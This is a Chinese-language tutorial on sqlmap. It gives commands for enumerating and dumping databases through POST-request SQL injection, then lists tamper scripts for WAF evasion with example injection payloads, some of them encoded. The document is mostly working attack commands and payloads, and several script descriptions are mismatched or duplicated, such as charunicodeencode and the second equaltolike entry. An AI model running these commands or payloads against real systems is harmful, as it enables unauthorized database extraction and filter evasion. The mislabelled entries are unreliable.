sqlmap工具的使用 (超详细附工具版)_python sqlmap

POST请求

方法一

• 查询所有数据库；（注：需将post数据保存为指定文件，例如：C:\1.txt）

python sqlmap.py -r “保存文件路径” --dbs

• 查询指定数据库中所有表；

python sqlmap.py -r “保存文件路径” -D “库名” --tables

• 查询指定表中字段名；

python sqlmap.py -r “保存文件路径” -D “库名” -T “表名” --columns

• 查询指定表中字段值；

python sqlmap.py -r “保存文件路径” -D “库名” -T “表名” -C “字段名” --dump

方法二

• 查询所有数据库；

python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit --dbs

• 查询指定数据库中所有表；

python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” --tables

• 查询指定表中字段名；

python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” --columns

• 查询指定表中字段值；

python sqlmap.py -u “http://x.x.x.x/” --data=uname=admin&passwd=admin&submit=Submit -D “库名” -T “表名” -C “字段名” --dump

进阶使用

绕过waf

–identify-waf 检测是否有WAF

• 使用方法

python sqlmap.py -u “http://x.x.x.x/” --dbs --tamper=xxx.py

大概脚本如下

apostrophemask.py脚本：将引号替换为utf-8，用于过滤单引号
将 1 AND '1'='1 替换为 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

base64encode.py脚本：替换为base64编码
将 1' AND SLEEP(5)# 替换为 MScgQU5EIFNMRUVQKDUpIw==

space2plus.py脚本：用加号替换空格
将 SELECT id FROM users 替换为 SELECT+id+FROM+users

nonrecursivereplacement.py脚本：作为双重查询语句，用双重语句替代预定义的sql关键字
将 1 UNION SELECT 2-- 替换为 1 UNIOUNIONN SELESELECTCT 2--

space2randomblank.py脚本：将空格替换为其他有效字符
将 SELECT id FROM users 替换为 SELECT%0Did%0DFROM%0Ausers

unionalltounion.py脚本：将union allselect 替换为unionselect
将 -1 UNION ALL SELECT 替换为 -1 UNION SELECT

securesphere.py脚本：追加特定的字符串
将 1 AND 1=1 替换为 1 AND 1=1 and '0having'='0having

multiplespaces.py脚本：围绕sql关键字添加多个空格
将 1 UNION SELECT foobar 替换为 1 UNION SELECT foobar

space2dash.py脚本：将空格替换为–，并添加一个随机字符串和换行符
将 1 AND 9227=9227 替换为 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227

space2mssqlblank.py脚本：将空格随机替换为其他空格符号(%01，%02，%03，%04，%05，%06，%07，%08，%09，%0B，%0C，%0D，%0E，%0F，%0A)
将 SELECT id FROM users 替换为 SELECT%0Eid%0DFROM%07users

between.py脚本：用NOT BETWEEN 0 AND 替换 >
将 1 AND A > B-- 替换为 1 AND A NOT BETWEEN 0 AND B--

percentage.py脚本：在每个字符前添加一个%
将 SELECT FIELD FROM TABLE 替换为 %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

sp_password.py脚本：从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password
将 1 AND 9227=9227-- 替换为 1 AND 9227=9227-- sp_password

randomcase.py脚本：随机大小写
将 INSERT 替换为 INseRt

charencode.py脚本：对给定的payload全部字符使用url编码 (不处理已经编码的字符)
将 SELECT FIELD FROM%20TABLE 替换为 %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

charunicodeencode.py脚本：用NOT BETWEEN 0 AND 替换 >
将 SELECT FIELD%20FROM TABLE 替换为 %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

space2comment.py脚本：将空格替换为 /**/
将 SELECT id FROM users 替换为 SELECT/**/id/**/FROM/**/users

equaltolike.py脚本：将 = 替换为 LIKE
将 SELECT * FROM users WHERE id=1 替换为 SELECT * FROM users WHERE id LIKE 1

randomcomments.py脚本：用 NOT BETWEEN 0 AND 替换 >
将 INSERT 替换为 I/**/N/**/SERT

equaltolike.py脚本：将 > 替换为 GREATEST，绕过对 > 的过滤
将 1 AND A > B 替换为 1 AND GREATEST(A,B+1)=A

ifnull2ifisnull.py脚本：绕过对 IFNULL 的过滤
将 IFNULL(1, 2) 替换为 IF(ISNULL(1),2,1)

modsecurityversioned.py脚本：过滤空格，使用mysql内联注释的方式进行注入
将 1 AND 2>1-- 替换为 1 /*!30874AND 2>1*/--